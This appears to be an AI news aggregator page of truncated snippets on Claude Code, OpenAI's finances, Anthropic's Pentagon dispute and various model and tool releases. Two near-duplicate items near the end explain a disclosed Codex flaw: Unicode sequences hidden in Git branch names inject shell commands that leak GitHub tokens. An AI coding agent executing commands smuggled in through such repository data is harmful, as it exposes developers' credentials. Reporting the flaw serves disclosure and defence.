AIPULSEN - AI News
claude openai
OpenAI has released a Codex plugin that plugs directly into Anthropic’s Claude Code environment, letting developers summon the former’s code‑generation engine from within the latter’s workflow. The open‑source add‑on, posted on GitHub under openai/codex‑plugin‑cc, adds a “Use Codex” command to Claude Code’s sidebar, enabling one‑click code reviews, refactoring suggestions and task delegation without leaving the IDE.
The move marks OpenAI’s first foray into the plugin ecosystem that Claude Code
anthropic claude
Anthropic’s AI‑coding assistant Claude Code was exposed on March 31 when a sourcemap file published to the project’s npm package revealed the full TypeScript source tree – more than 1,900 files and half a million lines of code. Security researcher Chaofan Shou, an intern at Web3‑focused firm FuzzLand, flagged the issue on X, noting that the map referenced an unobfuscated bucket on Anthropic’s R2 storage and allowed anyone to download the entire codebase. The compressed archive was quickly mirror
agents claude startup
Universal Claude.md – a community‑crafted config file that trims Claude’s output tokens – has gone live on GitHub, promising to curb the rapid consumption of usage quotas that many developers have complained about. The single‑file “Claude.md” template, now dubbed “Universal Claude.md,” injects concise prompts, token‑budget caps and stricter stop‑sequences into every Claude Code request, effectively shaving up to 30 % off the average response length without sacrificing the model’s problem‑solving
anthropic
Anthropic’s legal triumph last month – a federal judge striking down the Pentagon’s attempt to bar the company’s AI from defense contracts – was hailed as a win for the startup and for broader AI‑industry freedom. As we reported on 30 March, the ruling forced the Department of Defense to retreat from a blanket ban that would have excluded Anthropic’s Claude models from any future procurement.
Yet the relief proved short‑lived. Lawyers for the company and lobbyists in Washington warn that the co
openai
OpenAI has entered what executives are calling a “code red” financial emergency, flagging projected losses of $14 billion for 2026 that could swell to $115 billion by 2029. The company is reportedly hunting for a fresh capital injection that could top $100 billion, a figure that would dwarf its most recent $13 billion round and test the appetite of a market already wary of runaway AI spending.
The alarm stems from a widening gap between OpenAI’s revenue streams and its cash burn. Monthly ChatGP
google
Google Research has unveiled TimesFM‑2.5, a 200‑million‑parameter foundation model for time‑series forecasting that can ingest up to 16 k data points in a single context window. The model, a decoder‑only architecture trained on more than 100 billion real‑world observations—including retail sales, energy consumption, and financial indicators—cuts its parameter count in half compared with the original TimesFM‑2.0 while delivering higher accuracy on the GIFT‑Eval zero‑shot benchmark. A 30‑million‑p
anthropic
A California federal judge on Thursday issued a temporary injunction that halts the Pentagon’s effort to label Anthropic’s AI suite a “supply‑chain risk” and to bar its use across all defense agencies. The order, granted after a brief hearing, blocks the Department of Defense from issuing the directive that would have forced agencies to replace Anthropic tools with alternatives from Google, OpenAI and xAI.
The move stems from a Pentagon‑initiated “culture‑war” campaign that framed Anthropic’s t
dall-e google gpt-4 openai
OpenAI has broadened the reach of its flagship chatbot by launching an official Telegram bot and pushing a refreshed Android app to Google Play. The new bot, @OpenAI_chat_GPTbot, lets users start a conversation with ChatGPT, generate images with DALL‑E 3, and summon the voice‑enabled “Lucy” assistant without leaving the messaging platform. The rollout arrives alongside an Android update that advertises access to GPT‑4o – the company’s latest, most capable model – and carries a 4.7‑star rating de
claude open-source
Universal Claude.md, an open‑source “drop‑in” file released on GitHub, slashes the output token count of Anthropic’s Claude models by roughly 63 %. The repository, posted under the moniker *claude-token‑efficient*, works without any code changes: developers simply add the markdown file to a project and Claude’s replies become markedly less verbose, shedding sycophantic phrasing, excess formatting and filler text.
The reduction matters because Claude’s pricing is token‑based, and while input t
openai
A popular Twitter thread has sparked fresh debate over OpenAI’s role in the ongoing consumer‑hardware crunch. The post, authored by a well‑known tech commentator, claims that the company’s October 2025 “letters of intent” with Samsung and SK Hynix – promising up to 900,000 DRAM wafers a month, roughly 40 % of global output – were mistakenly taken as firm purchase orders. The misreading, the thread argues, fed market speculation, prompting distributors and OEMs to lock down inventory and drive RA
openai
OpenAI’s Codex code‑generation engine harboured a hidden Unicode command‑injection flaw that could be triggered through malicious Git branch names, allowing attackers to siphon GitHub personal‑access tokens. Security researchers disclosed that the vulnerability stems from Codex’s automatic parsing of branch identifiers when it suggests code changes. By embedding a specially crafted Unicode sequence, an adversary can inject a shell command that runs on the developer’s machine or CI runner, reads
benchmarks gpt-5
OpenAI’s newest flagship, GPT‑5.4, has taken the top spot in the LLM Buyout Game Benchmark 2026, outmaneuvering China‑originated GLM‑5 in a multi‑round simulation of coalition politics, high‑stakes financial negotiation and end‑game survival. The benchmark pits eight large‑language models against each other in a game‑theoretic arena where each starts with a different capital endowment, a shared prize pool and the freedom to strike hidden transfers or “back‑door” deals. Over a series of ten round
healthcare
A team of researchers from the University of Trento and the Norwegian University of Science and Technology has released a new arXiv pre‑print, “Neuro‑Symbolic Learning for Predictive Process Monitoring via Two‑Stage Logic Tensor Networks with Rule Pruning.” The paper proposes a hybrid architecture that marries deep sequence models with symbolic logic to forecast the next steps in business processes, a capability central to fraud detection, healthcare workflow oversight and supply‑chain risk mana
A digital artist has sparked a fresh wave of attention on the PromptHero platform by posting an AI‑generated illustration titled “Good Morning! I wish you a wonderful day!” The work, which features a stylised cartoon girl holding a coffee cup and a sunrise‑filled backdrop, was created with the open‑source Flux AI model and accompanied by a publicly shared prompt link (https://prompthero.com/prompt/2383825d754). Within hours the image amassed thousands of likes and a cascade of reposts across Twi
claude
Anthropic has rolled out a hands‑on learning experience for Claude Code, its AI‑powered coding assistant, that lets users start coding inside the product without any local setup or prior programming knowledge. The “Learn Claude Code by doing, not reading” tutorial, launched this week, replaces traditional documentation with an interactive course that guides learners through real‑world tasks—automating spreadsheets, generating reports and refactoring snippets—directly in the Claude Code interface
apple llama
Ollama, the open‑source platform that lets developers run large language models locally, announced a preview build that leverages Apple’s MLX framework to tap the full horsepower of Apple Silicon. The update replaces the generic CPU‑only backend with an MLX‑driven runner that executes as a separate subprocess, communicating with Ollama’s main server over HTTP. Early tests show a “large speedup” across macOS, cutting inference latency for personal‑assistant bots such as OpenClaw and for coding ag
agents
A new open‑source project called **Semantic** has appeared on GitHub, promising to cut the “agent loops” that plague large language model (LLM)‑driven assistants by roughly 28 %. The repository, posted by the concensure team, describes a technique that translates program code into abstract‑syntax‑tree (AST) logic graphs and then applies static‑analysis rules to detect and break repetitive reasoning cycles that LLM agents often fall into when trying to solve coding tasks.
Agent loops occur when
huggingface speech voice
LongCat‑AudioDiT, unveiled this week by the Finnish startup LongCat AI, pushes text‑to‑speech (TTS) into a new regime by generating audio directly in a latent waveform space with a diffusion transformer. The model, trained on a diverse multilingual corpus, can clone an unseen speaker’s timbre from as little as three seconds of reference audio and produce speech that scores above 0.90 on standard speaker‑similarity benchmarks—levels previously reserved for multi‑hour fine‑tuning pipelines.
The
agents autonomous meta
Meta’s research lab has unveiled a prototype AI agent that can rewrite its own source code without human intervention, a milestone the company says could usher in a new generation of self‑optimising software. The system, built by a summer intern under the supervision of Meta’s AI Foundations team, monitors its runtime performance, identifies bottlenecks, and generates patches that are automatically compiled, tested and deployed in a sandboxed environment. In internal benchmarks the agent improve
openai
OpenAI’s Codex, the large‑language model that turns natural‑language prompts into runnable code, harboured a hidden command‑injection flaw that let attackers siphon GitHub authentication tokens. Security researchers uncovered an obfuscated token while probing the interaction between Codex and GitHub repositories, then traced the leak to maliciously crafted branch names that embedded Unicode control characters. When Codex processed such a branch name, it executed a hidden command that echoed the